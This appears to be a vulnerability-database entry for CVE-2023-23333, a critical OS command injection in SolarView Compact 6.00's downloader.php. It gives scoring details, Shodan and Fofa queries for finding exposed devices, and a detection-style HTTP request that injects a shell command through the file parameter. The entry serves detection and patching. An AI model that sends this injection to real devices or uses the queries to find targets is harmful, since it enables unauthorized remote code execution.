🔙 목록으로 돌아가기

CVE-2023-23333: SolarView Compact 6.00 - OS Command Injection

TitleSolarView Compact 6.00 - OS Command Injection
AuthorMr-xn
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the system.
RemediationApply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00.
CVSS Score9.8
EPSS Score0.94216
CVE IDCVE-2023-23333
CWE IDCWE-77
Shodan Queryhttp.html:"SolarView Compact"http.favicon.hash:"-244067125"http.html:"solarview compact"cpe:"cpe:2.3:o:contec:solarview_compact_firmware"
Fofa Querybody="SolarView Compact" && title="Top"body="solarview compact" && title="top"icon_hash="-244067125"body="solarview compact"
Tags cve cve2023 packetstorm solarview rce contec vkev vuln

🔍 Vulnerability Description

SolarView Compact 6.00 was discovered to contain a command injection vulnerability, attackers can execute commands by bypassing internal restrictions through downloader.php.

🌐 HTTP Request

GET /downloader.php?file=%3Becho+CVE-2023-23333|rev%00.zip HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-23333.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-23333.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A